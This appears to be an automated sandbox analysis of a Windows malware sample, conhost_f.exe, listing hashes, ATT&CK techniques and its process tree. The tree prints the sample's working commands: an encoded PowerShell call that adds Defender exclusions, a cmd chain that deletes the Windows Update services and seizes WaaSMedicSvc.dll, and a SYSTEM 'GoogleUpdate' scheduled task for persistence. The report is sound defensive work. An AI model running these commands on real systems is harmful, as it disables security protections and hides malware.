5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

Analysis

max time kernel
134s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
17-08-2022 19:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

conhost_f.exe
Size

1.8MB
MD5

eecdf1e5eb81226c10e087d0f79de8f2
SHA1

9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2
SHA256

5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8
SHA512

2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

3488 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1296 icacls.exe
3624 takeown.exe
3508 icacls.exe
2180 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3488	updater.exe

pid	process
1296	icacls.exe
3624	takeown.exe
3508	icacls.exe
2180	takeown.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

conhost_f.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	conhost_f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	updater.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

3508 icacls.exe
2180 takeown.exe
1296 icacls.exe
3624 takeown.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

updater.exe

description pid process target process

PID 3488 set thread context of 3376 3488 updater.exe conhost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2544 sc.exe
1992 sc.exe
4388 sc.exe
4212 sc.exe
1624 sc.exe
1712 sc.exe
5060 sc.exe
4484 sc.exe
364 sc.exe
1804 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2752 schtasks.exe

pid	process
3508	icacls.exe
2180	takeown.exe
1296	icacls.exe
3624	takeown.exe

description	pid	process	target process
PID 3488 set thread context of 3376	3488	updater.exe	conhost.exe

pid	process
2544	sc.exe
1992	sc.exe
4388	sc.exe
4212	sc.exe
1624	sc.exe
1712	sc.exe
5060	sc.exe
4484	sc.exe
364	sc.exe
1804	sc.exe

pid	process
2752	schtasks.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1988	reg.exe
1824	reg.exe
4116	reg.exe
644	reg.exe
1656	reg.exe
1996	reg.exe
3216	reg.exe
2828	reg.exe
2644	reg.exe
2560	reg.exe
2680	reg.exe
4740	reg.exe
2668	reg.exe
2152	reg.exe
3728	reg.exe
5036	reg.exe
5100	reg.exe
456	reg.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.execonhost_f.exepowershell.exeupdater.exe

pid process

2404 powershell.exe
2404 powershell.exe
4580 conhost_f.exe
2832 powershell.exe
2832 powershell.exe
3488 updater.exe

pid	process
2404	powershell.exe
2404	powershell.exe
4580	conhost_f.exe
2832	powershell.exe
2832	powershell.exe
3488	updater.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.execonhost_f.exetakeown.exepowershell.exeupdater.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	4580	conhost_f.exe
Token: SeTakeOwnershipPrivilege	3624	takeown.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	3488	updater.exe
Token: SeTakeOwnershipPrivilege	2180	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

conhost_f.execmd.execmd.execmd.execmd.exeupdater.execmd.exe

description	pid	process	target process
PID 4580 wrote to memory of 1572	4580	conhost_f.exe	cmd.exe
PID 4580 wrote to memory of 1572	4580	conhost_f.exe	cmd.exe
PID 1572 wrote to memory of 2404	1572	cmd.exe	powershell.exe
PID 1572 wrote to memory of 2404	1572	cmd.exe	powershell.exe
PID 4580 wrote to memory of 4776	4580	conhost_f.exe	cmd.exe
PID 4580 wrote to memory of 4776	4580	conhost_f.exe	cmd.exe
PID 4776 wrote to memory of 1992	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 1992	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 364	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 364	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 1804	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 1804	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 4388	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 4388	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 4212	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 4212	4776	cmd.exe	sc.exe
PID 4776 wrote to memory of 2680	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 2680	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 456	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 456	4776	cmd.exe	reg.exe
PID 4580 wrote to memory of 220	4580	conhost_f.exe	cmd.exe
PID 4580 wrote to memory of 220	4580	conhost_f.exe	cmd.exe
PID 4776 wrote to memory of 1996	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 1996	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 5036	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 5036	4776	cmd.exe	reg.exe
PID 220 wrote to memory of 2752	220	cmd.exe	schtasks.exe
PID 220 wrote to memory of 2752	220	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 4740	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 4740	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 3624	4776	cmd.exe	takeown.exe
PID 4776 wrote to memory of 3624	4776	cmd.exe	takeown.exe
PID 4776 wrote to memory of 3508	4776	cmd.exe	icacls.exe
PID 4776 wrote to memory of 3508	4776	cmd.exe	icacls.exe
PID 4776 wrote to memory of 1656	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 1656	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 5100	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 5100	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 1988	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 1988	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 2668	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 2668	4776	cmd.exe	reg.exe
PID 4776 wrote to memory of 1740	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 1740	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 4196	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 4196	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 904	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 904	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 2364	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 2364	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 2412	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 2412	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 5008	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 5008	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 4672	4776	cmd.exe	schtasks.exe
PID 4776 wrote to memory of 4672	4776	cmd.exe	schtasks.exe
PID 4580 wrote to memory of 716	4580	conhost_f.exe	cmd.exe
PID 4580 wrote to memory of 716	4580	conhost_f.exe	cmd.exe
PID 716 wrote to memory of 3488	716	cmd.exe	updater.exe
PID 716 wrote to memory of 3488	716	cmd.exe	updater.exe
PID 3488 wrote to memory of 5020	3488	updater.exe	cmd.exe
PID 3488 wrote to memory of 5020	3488	updater.exe	cmd.exe
PID 5020 wrote to memory of 2832	5020	cmd.exe	powershell.exe
PID 5020 wrote to memory of 2832	5020	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\conhost_f.exe
"C:\Users\Admin\AppData\Local\Temp\conhost_f.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
2⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:4776

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1992

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:364

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1804

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4388

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4212

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:2680

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:456

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:1996

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:5036

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4740

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3508

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1656

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:5100

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1988

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2668

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1740

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:4196

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:904

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:2364

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:2412

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:5008

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdate" /tr "C:\Users\Admin\Chrome\updater.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdate" /tr "C:\Users\Admin\Chrome\updater.exe"
3⤵
- Creates scheduled task(s)
PID:2752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:716

C:\Users\Admin\Chrome\updater.exe
C:\Users\Admin\Chrome\updater.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1964

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1624

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1712

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:2544

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:5060

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:4484

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1824

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:3216

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:2828

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:2644

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:2560

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2152

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3728

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4116

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:644

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:4464

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:3964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:3924

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1916

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1012

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:4520

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4888

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
PID:3376

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "usrjhfjun"
5⤵
PID:4912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\Chrome\updater.exe

Filesize
1.8MB

MD5
eecdf1e5eb81226c10e087d0f79de8f2

SHA1
9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2

SHA256
5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

SHA512
2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Download Submit
C:\Users\Admin\Chrome\updater.exe

Filesize
1.8MB

MD5
eecdf1e5eb81226c10e087d0f79de8f2

SHA1
9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2

SHA256
5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

SHA512
2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Download Submit
memory/220-148-0x0000000000000000-mapping.dmp

Download
memory/364-142-0x0000000000000000-mapping.dmp

Download
memory/456-147-0x0000000000000000-mapping.dmp

Download
memory/644-201-0x0000000000000000-mapping.dmp

Download
memory/716-166-0x0000000000000000-mapping.dmp

Download
memory/904-161-0x0000000000000000-mapping.dmp

Download
memory/1012-206-0x0000000000000000-mapping.dmp

Download
memory/1296-196-0x0000000000000000-mapping.dmp

Download
memory/1572-133-0x0000000000000000-mapping.dmp

Download
memory/1624-180-0x0000000000000000-mapping.dmp

Download
memory/1656-155-0x0000000000000000-mapping.dmp

Download
memory/1712-181-0x0000000000000000-mapping.dmp

Download
memory/1740-159-0x0000000000000000-mapping.dmp

Download
memory/1804-143-0x0000000000000000-mapping.dmp

Download
memory/1824-189-0x0000000000000000-mapping.dmp

Download
memory/1916-205-0x0000000000000000-mapping.dmp

Download
memory/1964-179-0x0000000000000000-mapping.dmp

Download
memory/1988-157-0x0000000000000000-mapping.dmp

Download
memory/1992-141-0x0000000000000000-mapping.dmp

Download
memory/1996-149-0x0000000000000000-mapping.dmp

Download
memory/2152-198-0x0000000000000000-mapping.dmp

Download
memory/2180-195-0x0000000000000000-mapping.dmp

Download
memory/2364-162-0x0000000000000000-mapping.dmp

Download
memory/2404-138-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/2404-137-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/2404-136-0x000002737E520000-0x000002737E542000-memory.dmp

Filesize
136KB

Download
memory/2404-134-0x0000000000000000-mapping.dmp

Download
memory/2412-163-0x0000000000000000-mapping.dmp

Download
memory/2544-182-0x0000000000000000-mapping.dmp

Download
memory/2560-194-0x0000000000000000-mapping.dmp

Download
memory/2644-193-0x0000000000000000-mapping.dmp

Download
memory/2668-158-0x0000000000000000-mapping.dmp

Download
